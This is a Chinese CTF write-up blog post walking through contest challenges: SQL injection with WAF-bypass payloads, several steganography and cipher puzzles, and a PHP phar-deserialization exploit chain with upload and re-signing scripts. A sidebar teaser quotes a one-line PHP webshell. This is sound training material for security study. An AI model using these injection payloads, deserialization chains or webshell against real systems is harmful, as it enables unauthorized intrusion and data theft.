【浅记CTF(一)】复习周来袭

最新推荐文章于 2022-12-30 21:15:27 发布
原创 最新推荐文章于 2022-12-30 21:15:27 发布
· 3.8k 阅读 · 5 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #php #信息安全

本文复盘了多项CTF竞赛题目,包括SQL注入、杂项解密、LSB隐写术、栅栏密码解密、Unix解压、Base64算法、MP3隐写、IP置换盒算法、LSB隐写术获取密码及Web反序列化等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言:

不多但都是自己认认真真复盘的
里面的代码都是自己敲出来的
毕竟人家复盘讲解啥的给你看看就不错了~
复习周来了,不得不去。
有收获的话就给个赞吧…
首发于 https://sleepymonster.cn/

【WEB】sql_checkin

题目来自 2021暨南大学新生赛决赛Web签到题

直接放WAF

<?php
function waf($var)
{
    if(preg_match("/select|union|or|ro|where/", $var)){
        return 'no no no';
    }
    else{
        return $var;
    }    
}

这是一道非常基础的题,过程我就不放了,放个脚本吧。

一步步做就很方便,具体怎么改操作tamper就好了

def tamper(payload, **kwargs):
    payload= payload.lower()
    payload= payload.replace('group_contact' , 'GROUP_CONCAT') # 因为是函数 所以就不支持大小写混用
    payload= payload.replace('select' , 'Select')
    payload= payload.replace('union' , 'Union')
    payload= payload.replace('or' , 'Or')
    payload= payload.replace('ro' , 'Ro')
    payload= payload.replace('where' , 'Where')
    retVal=payload
    return retVal


database = 'easysql'
table = 'flag'
column = 'flag'
payloadFindField = '" union select 1,2,3 #'
payloadFindFlag = f'" union select 1,2,(select {column} from {database}.{table}) #'
payloadFindColumn = f'" union select 1,2,(select group_contact(column_name) from information_schema.columns where table_schema="{database}" and table_name="{table}") #'
payloadFindTable = f'" union select 1,2,(select group_contact(table_name) from information_schema.tables where table_schema="{database}") #'
payloadFindDataBase = '" union select 1,2,(select group_contact(schema_name) from information_schema.schemata) #'
payloadArray = [payloadFindDataBase, payloadFindTable, payloadFindColumn, payloadFindFlag]
payloadDescription = ['判断数据库','判断数据表','判断数据列','拿到Flag']
progress = 0 + int(database is not '') + int(table is not '') + int(column is not '')
print(f'[*] 请先判断字段:{payloadFindField}')
print(f'[*] 当前进度:{payloadDescription[progress]}, 请复制下一行的话进行注入')
print(tamper(payloadArray[progress]))

【杂项】easy_misc

题目来自 2021暨南大学新生赛初赛

莫斯密码解密

解密网站:http://www.hiencode.com/morse.html

image-20211210162638132

lsb加密隐写

用了stegsolve找不到

用了zsteg zsteg ./lalala.png -v还是不行

找了Steghide以为是把密码写到文件里面然后用莫斯那个密码解出来,还是不行

Steghide 参考链接 https://www.jianshu.com/p/c3679f805a0c

最后是问了大佬 https://github.com/livz/cloacked-pixel

开始动手~

image-20211210163050398 image-20211210164134547

拿到解压密码 this_is_the_second_password

栅栏密码

解密网站:https://www.qqxiuzi.cn/bianma/zhalanmima.php

image-20211210164421539

【杂项】Un(ix)zip

题目来自 第四届2021美团网络安全高校挑战赛

unixzip

unzip 就是解压,unix就是在unix下

image-20211211133826610

一共有36位然后依照顺序连起来

ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9

Base64

Base64算法

  • 第一步,“M”、“a”、"n"的ASCII值分别是77、97、110,对应的二进制值是01001101、01100001、01101110,将它们连成一个24位的二进制字符串010011010110000101101110。

  • 第二步,将这个24位的二进制字符串分成4组,每组6个二进制位:010011、010110、000101、101110。

  • 第三步,在每组前面加两个00,扩展成32个二进制位,即四个字节:00010011、00010110、00000101、00101110。它们的十进制值分别是19、22、5、46。

  • 第四步,根据表格,得到每个值对应Base64编码,即T、W、F、u。

如果字节数不足三(余2 与 余1)

  • “M”、“a” => 01001101、01100001 => 010011|010110|0001=> 00010011|00010110|00000100(最后一组除了前面加两个0以外,后面也要加两个0) => 对应Base64值分别为T、W、E,再补上一个"="号,因此"Ma"的Base64编码就是TWE=
  • “M” => 01001101 => 010011|01 => 00010011 | 00010000 => TQ== 补上二个"="号

上面的一共有36位 一个字母为一个字节即8Bit 为3的倍数

import base64
print(base64.b64decode("ZmxhZ3tXZWxjMG1lX1VuejFwX1dvbmRlcjR9"))

【杂项】Do_you_konw_school_motto(复现)

题目来自 2021年暨南大学新生赛决赛

Mp3隐写

一般是查询谱写,隐谱图。

发现了个工具箱整理:太长了

工具🔧 https://www.petitcolas.net/steganography/mp3stego/

image-20211213235441991 image-20211213235759342

IP置换盒?

我直接好家伙:其实拼图算法就出来了

但是! 图片损坏了。

$ sudo ./gaps --image=question.png --generations=20 --population=600 --size=200
image-20211214004324586 image-20211214004237154

所以很难受 不得不跟着做

参考链接: DES加密算法中的IP置换算法

import cv2
import numpy as np

IP_BOX = [
    [58, 50, 42, 34, 26, 18, 10, 2], 
    [60, 52, 44, 36, 28, 20, 12, 4],
    [62, 54, 46, 38, 30, 22, 14, 6],
    [64, 56, 48, 40, 32, 24, 16, 8],
    [57, 49, 41, 33, 25, 17, 9, 1],
    [59, 51, 43, 35, 27, 19, 11, 3],
    [61, 53, 45, 37, 29, 21, 13, 5],
    [63, 55, 47, 39, 31, 23, 15, 7]
 ]

IP_NBOX = [
    [40, 8, 48, 16, 56, 24, 64, 32],
    [39, 7, 47, 15, 55, 23, 63, 31],
    [38, 6, 46, 14, 54, 22, 62, 30],
    [37, 5, 45, 13, 53, 21, 61, 29],
    [36, 4, 44, 12, 52, 20, 60, 28],
    [35, 3, 43, 11, 51, 19, 59, 27],
    [34, 2, 42, 10, 50, 18, 58, 26],
    [33, 1, 41, 9, 49, 17, 57, 25]
]

def IP(path, cutNum, toPath):
    img = cv2.imread(path)
    m, n , _ = img.shape
    block_size = m // cutNum
    res = np.zeros((m,n,3))
    for i in range(cutNum):
        for j in range(cutNum):
            r = (IP_BOX[i][j] - 1) // cutNum
            c = (IP_BOX[i][j] - 1) % cutNum
            res[i * block_size:(i +1 ) * block_size, j * block_size:(j +1 ) * block_size, :] = img[r * block_size:(r + 1) * block_size, c * block_size:(c +1 ) * block_size, :]
    cv2.imwrite(toPath, res)

def IPR(Path, cutNum, toPath):
    img = cv2.imread(Path)
    m, n , _ = img.shape
    block_size = m // cutNum
    res = np.zeros((m,n,3))
    for i in range(cutNum):
        for j in range(cutNum):
            r = (IP_NBOX[i][j] - 1) // cutNum
            c = (IP_NBOX[i][j] - 1) % cutNum
            res[i * block_size:(i +1 ) * block_size, j * block_size:(j +1 ) * block_size, :] = img[r * block_size:(r + 1) * block_size, c * block_size:(c +1 ) * block_size, :]  # 进行调换
    cv2.imwrite(toPath, res)

IPR('./question.png',8,'out.png')

lsb加密隐写

查看得到密码 8GpsKK2Ca!

$ python2 lsb.py extract ./out.png out 8GpsKK2Ca!
image-20211214012232653

拿到flag flag{rAnd0m_1sB_1s_fUN}

【WEB】medium-unserialize【复现】

题目来自 2021暨南大学新生赛决赛

仓库地址:https://github.com/mi3aka/xp0int-2021-ctf-web/tree/master/medium-unserialize

了解整个逻辑

我学完了我在最开始来总结下整个思路吧。

我相信带着答案反推学习应该是不错的。

		首先是**Main**类是唯一能控制的地方,即**Main**中的data和str是唯一能传值的地方。str处的过滤是为了限定死就是只能上传phar文件来触发反序列化。data的写就是把phar用python写进去,读的话就是file_exists会触发phar包的反序列化。然后data写入的绕过为file_put_contents为数组/资源绕过,而我们上传的phar包相当于免疫了此处的preg_match。到这里可以自由写入文件以及触发反序列化。

​		然后就是开始构造pop链。从**Welcome**开始进入。sha1与sha2是要用原生类报错来绕过。才能进入下面的if。wow没必要进去,但是通过md5($this->welcome)判断的时候会触发__toString() 方法来开始触发pop链。来到**User**里面调用$this->private_info['address']是个类的话,继续触发。来到**Filter**触发get()用于从不可访问的属性读取数据,这里是因为$this->private_info['address']->birthplace来触发。此时的$name就是birthplace为参数了, 去调用get($name)方法。而此时$this->params设置键为birthplace值为**flag**类来触发call_user_func从而拿到了flag。

​		可以看到Route,Info,Method类都是障眼法..除了常见的类之外还要了解—get(),__toString()等,以及Phar等。复盘不易,代码都是自己敲了一遍。

Phar反序列化

思路就是:

file_put_contents https://www.php.net/manual/zh/function.file-put-contents.php

类型可以是 string,array 或者是 stream 资源 即$_POST[“data”]可以为数组绕过后正常写入文件

先激活Main类绕过了Waf后进行文件的写入

再通过file_exists($data) 进行phar反序列化 激活上面的一串类

意思就是先写入了文件之后呢,再用file_exists去访问该文件,

访问的时候会触发phar:///tmp/xxx.xpoint解析,如果符合phar文件

则会触发里面的反序列化 达到效果。

class Main  # 用于写入过waf写文件的
{
    public $operate;

    public function __destruct()  
    {
        echo "进入了Main的__destruct".'</br>';
        if (!isset($_POST["data"]) || preg_match('/GBMB|file|http|ftp|php|zlib|data|glob|ssh2|rar|ogg|expect|filter|read|base|rot|get|post|class|Welcome|Route|Info|User|Filter|Method|Flag|zip|tar/i', $_POST["data"])) {
            die("???");
        }
        $data = $_POST["data"];
        echo "当前的data为:".$data.'</br>';
         // 反序列化之后Main类的operate为'w'/'r'
        if ($this->operate === 'w') {
            $filename = "./tmp/" . md5(time()) . ".xp0int";
            file_put_contents($filename, $data);
            echo $filename.'</br>';
        } else if ($this->operate === 'r') {
            if (file_exists($data)) {
                echo("wow!!!<br>");
            } else {
                die("No File!!!");
            }
        }
    }
}

原生类的反序列化

绕过instanceof与sha与md5r绕过

instanceof 用于确定一个PHP 变量是否属于某一类class 的实例

第一处: $this->sha1 与 $this->sha2 不能为空;不能为数组;sha1 与 md5要相等;还都不是以上那些类中;

class Welcome
{
    public $welcome;
    public $randcode;
    public $code;
    public $sha1;
    public $sha2;

    public function __construct()
    {
        $this->welcome = "Welcome to Xp0int-CTF";
        echo $this->welcome . "<br>";
    }

    public function __destruct()
    {
        $this->randcode = rand(1, 10086);
        if ($this->sha1 instanceof Filter || $this->sha1 instanceof Route || $this->sha1 instanceof User || $this->sha1 instanceof Info || $this->sha1 instanceof Method || $this->sha2 instanceof Filter || $this->sha2 instanceof Route || $this->sha2 instanceof User || $this->sha2 instanceof Info || $this->sha2 instanceof Method || empty($this->sha1) || empty($this->sha2) || is_array($this->sha1) || is_array($this->sha2) || ($this->sha1 == $this->sha2) || !(sha1($this->sha1) === sha1($this->sha2)) || !(md5($this->sha1) === md5($this->sha2))) {
            die("no no no");// $this->sha1 与 $this->sha2 不能为空;不能为数组;sha1 与 md5要相等;还都不是以上那些类中;
        }
        if ($this->randcode === $this->code && md5($this->welcome) === md5(time())) {
            echo("wow!!!<br>"); // 绕过恒等
        } else {
            die("(:");
        }
    }
}

// 使用原生类来绕过第一处

$a = new Exception($message = 'php', $code = 0);$b = new Exception($message = 'php', $code = 1);
var_dump($a);
var_dump($b);
var_dump($a == $b);
echo $a.'</br>';
echo $b.'</br>';
// 会调用toString方法
var_dump(md5($a));
var_dump(md5($b));
var_dump(md5($a) == md5($b));
var_dump(sha1($a));
var_dump(sha1($b));
var_dump(sha1($a) == sha1($b));

// $randcode 与 $code 在一个类中
// 要完全相同则把地址给对方就好了
// 当然这里是障眼法
// md5 就是要去触发后面的魔术方法
class demo
{
    public $randcode;
    public $code;
    public function __destruct(){
        $this->randcode = rand(1, 10086);
        if ($this->randcode === $this->code) {
            echo("wow!!!<br>");
        } else {
            die("(:");
        }
    }
}

$one = new demo();
$one->code = & $one->randcode;
$a = serialize($one);
var_dump($a);
image-20211217114401193

强制垃圾回收gc

throw new Error("I can't destruct,help!!!");

执行phar会触发throw new Error,如何绕过?

在这里正常情况下的话:wakeup之后的话会执行throw new Error而不会执行destruct

所以我们为了执行destruct需要采用强制垃圾回收gc方法。

跟着大佬的复盘我也来复现下

<?php
class demo1
{
    public function __wakeup(){
        echo "我是demo1, 我苏醒了。"."</br>";
        $this->hello();
    }

    public function hello(){
        echo "我是demo1, 我执行了hello"."</br>";
    }

    public function __destruct(){
        echo "我是demo1, 我被销毁了"."</br>";
    }
}

class demo2
{
    public function __wakeup(){
        echo "我是demo2, 我苏醒了。"."</br>";
        $this->hello();
    }

    public function hello(){
        echo "我是demo2, 我执行了hello"."</br>";
    }

    public function __destruct(){
        echo "我是demo2, 我被销毁了"."</br>";
    }
}

// 其中 “a” 表示这是个数组,其中 “i” 表示 整型,“o” 表示对象。
$str = 'a:2:{i:0;O:5:"demo1":0:{}i:1;O:5:"demo2":0:{}}';
$tmp = unserialize($str);
var_dump($tmp);
// throw new Error("I can't destruct,help!!!");
image-20211220213817203

如果打开了throw new Error("I can't destruct,help!!!");注释:

image-20211220213900986

绕过方法有2个:

  • $str = 'a:2:{i:0;O:5:"demo1":0:{}i:0;O:5:"demo2":0:{}}'; 1 => 0

即demo1成功绕过throw new Error执行

image-20211220214042862
  • $str = 'a:2:{i:0;O:5:"demo1":0:{}}';
image-20211220214223770

构造phar包

class fake{}

$flag = new Flag();
$welcome = new Welcome();
$filter = new Filter();
$filter->params = array("birthplace" => array($flag, "getflag"));
$user = new User(array(1,2,3), array("address"=>$filter));
$welcome->code = & $welcome->randcode;
$welcome->welcome = $user;
$sha1 = new Error($message = 'test', $code = 0); $sha2 = new Error($message = 'test', $code = 1); # 不要换行
$welcome->sha1 = $sha1;
$welcome->sha2 = $sha2;

$fake = new fake();
$a = array($welcome, $fake);
var_dump(serialize($a));

$phar = new Phar("source.phar"); // 构造phar文件时后缀必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // 设置存根stub
$phar->setMetadata($a); // 将自定义的meta-data序列化后存入manifest
$phar->addFromString("a", "a"); // phar本质上是对文件的压缩所以要添加文件名字和内容
$phar->stopBuffering();

签名更改

参考链接 :https://www.php.net/manual/zh/phar.fileformat.signature.php

生成phar包后进行第二次篡改, 为了就是能强制进行垃圾回收

image-20211220220624106 
import gzip
import hashlib

def resign(source, target):
    phar = None
    with open(source, "rb") as f:
        phar = f.read()
    if b'i:1;O:4:"fake"' in phar:
        phar = phar.replace(b'i:1;O:4:"fake"', b'i:0;O:4:"fake"')
        print('更改成功')
    else:
        print('没找到')
    source = phar[:-28] # 需要进行签名的数据  20 + 4 + 4
    GBMB = phar[-8:]  # 签名标志(通常为sha1??)和GBMB标签  
    signature = hashlib.sha1(source).digest() # sha1签名 # 20位数
    phar = source + signature + GBMB
    with open(target, "wb") as f:
        f.write(phar)

def convert(source, target="a"):
    phar = None
    with open(source, "rb") as f:
        phar = f.read()
    with gzip.open(target, "wb") as f:
        f.write(phar)
source = '/Applications/MxSrvs/www/source.phar'
target = '/Applications/MxSrvs/www/target.phar'
resign(source, target)
convert(target)

左上是没有gzip的 左下是经过zip的 右边的就是对比

image-20211220223501266

上传phar包

import requests
import re

url = ""
phar = None
pharPath = '/Applications/MxSrvs/www/target.phar'
with open(pharPath, 'rb') as f:
    phar = f.read()
data = {
    'str' : 'O:4:"Main":1:{s:7:"operate";s:1:"w";}',
    'data' : phar
    }
r = requests.post(url=url, data=data)
rule = r'</code>(.+?)<br />'
result = re.findall(rule, r.text)
print(result)

最后再去触发

// payload:
str=O:4:"Main":1:{s:7:"operate";s:1:"r";}&data=phar///temp/xxxx.xpoint
CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 3107
比赛体验般,黑灯基本上题都烂掉。
SQL CHECK 语句详解
最新发布
lly202406的博客
02-13 676
SQL CHECK 语句是种定义在数据库表中,用于限制特定列数据的约束条件。只有当约束条件为真时,相关数据才能被插入或更新到数据库表中。SQL CHECK 语句是种非常有用的数据完整性约束,可以帮助我们保证数据的准确性和致性。在实际应用中,合理使用 CHECK 约束可以降低错误发生概率,提高数据质量,降低维护成本。本文对 SQL CHECK 语句进行了详细解析,希望能对您有所帮助。
攻防世界web---unserialize3
m0_72447684的博客
10-10 312
攻防世界web---unserialize3
【频域分析及处理】2. CTFT、DTFT、DFT、FFT
普罗米修斯的博客
11-12 4822
幅图弄清DFT与DTFT,DFS的关系 为了更好的分析单变量对结果的影响,本例不考虑频谱泄漏。 5.3 采样点数对结果的影响 【 6. 分辨率 】 6.1 时间分辨率 时间分辨率是指在同区域进行的相邻两次观测的最小时间间隔。时间间隔越小,时间分辨率越高。 反映在FFT中,就相当于对段序列的进行采样的采样期。 6.2 频率分辨率 频率分辨率是指将两个相邻谱峰分开的能力,在实际应用中是指分辨两个不同频率信号的最小间隔。 反映在FFT中,频率分辨率可以理解为在频率轴上的所能得到的最小频率间隔
15.CTF-web安全提权
woo233的博客
09-29 2398
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
CTF之MISC题目-简单流量
fredricen的专栏
12-30 1万+
这是道关于网络数据包分析的题目,主要是wireshark工具的使用和发现代码、理解代码。同时要了解Linux 的 Shell脚本。
第四届2021美团网络安全 MT-CTF writeup
qq_45603443的博客
01-11 3999
第四届2021美团网络安全 MT-CTF writeupWebUPstorageMiscUn(ix)zipReverserandomCryptohamburgerRSASymbolPwnbabyropblindboxbookshop重点来了 Web UPstorage 需要先xxe读session 找到ip,然后直接phar。 <?php abstract class Users { public $db; abstract public function verify_user($usernam
文件上传漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传: 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了句话木马的网站执行我们传递过去的任意PHP语句。这便是句话木马
php 反序列化总结
m0_64815693的博客
12-02 4162
php 反序列化从零开始到啥也不会 横批:篇足以
mysql隐时类型转换规则_MYSQL隐式类型转换
weixin_28759829的博客
01-18 484
前言今天看了下团队发的XCTF高校战疫的WP,这里先喊句。杨大树师傅太强了orz 几乎没帮啥忙,简单的题目都被师傅们秒了,我进度太慢,跟不上,后面难的题目基本动不了。再喊遍,星盟的师傅tql。再接再厉,希望下次能上师傅们,帮到师傅们解题。回顾主题,这里是从看到比赛里的sqlcheckin这道题目的WP后,才觉得很奇怪,然后百度发现并学习到了mysql的隐式类型转换的点。(比较菜没有仔细学习过...
CTF 攻略】CTF比赛中关于zip的总结
magic0code的博客
07-03 1954
点击打开链接
PHP绕过MD5比较的各种姿势
b1ackc4t的博客
08-27 9009
1.用==进行弱类型比较时, 可以通过两个0e开头后面纯数字的md5绕过 php在进行弱类型比较时,如果为字符串为纯数字,包括浮点数、科学计数法、十六进制数等,都会转化为数字类型再进行比较,利用这点,0e开头的科学计数法大小均为0,所有均相等,即可绕过 以下实例的md5均满足0e开头纯数字 byGcY sonZ7y 240610708 s878926199a s155964671a s214587387a s214587387a s878926199a QNKCDZO aabg7XS
BUUCTF--[极客大挑战 2020]Greatphp
qq_46263951的博客
08-11 1329
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
CTF里的LSB
weixin_30342209的博客
08-20 3112
转载于:https://www.cnblogs.com/xww115/p/11383579.html
CTF-杂项与密码学之工具使用汇总()
半岛铁盒的博客
02-02 1960
.outguess OutGuess是种通用的隐秘工具,可以将 隐藏信息插入冗余位中数据源。 使用范围 图片隐写; 当扔进 stegsolve 无果 winhex 无果 binwalk 无果 foremost 无果 就可以考虑outguess工具; 命令: outguess -r 图片 -t 1.txt ...
NewStarCTF 公开赛赛道 第二学习
m0_64815693的博客
10-03 2589
NewStarCTF 公开赛赛道 第二学习
CTF php反序列化总结
m0_53567065的博客
11-17 5714
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的些魔术方法。常用魔术方法
UnserializeOne
qq_64201116的博客
10-09 1370
_set() 用于将数据写入不可访问的属性 给个未定义的属性赋值时,此方法会被触发,传递的参数是被设置的属性名和值 // 不存在赋值。__set_state(),调用var_export()导出类时,此静态方法会被调用。__isset(),当对不可访问属性调用isset()或empty()时调用。__isset() 在不可访问的属性上调用isset()或empty()触发。__unset(),当对不可访问属性调用unset()时被调用。__invoke(),调用函数的方式调用个对象时的回应方法。
ctf个人来买瓜
06-09
在网络安全领域中,"CTF"是"Cybersecurity Treasure Hunt"(网络安全寻宝)的缩写,这是种常见的竞赛形式,通常涉及破解密码、网络攻防、取证分析、编程挑战等活动。参赛者通常组成团队,通过解决系列与信息安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值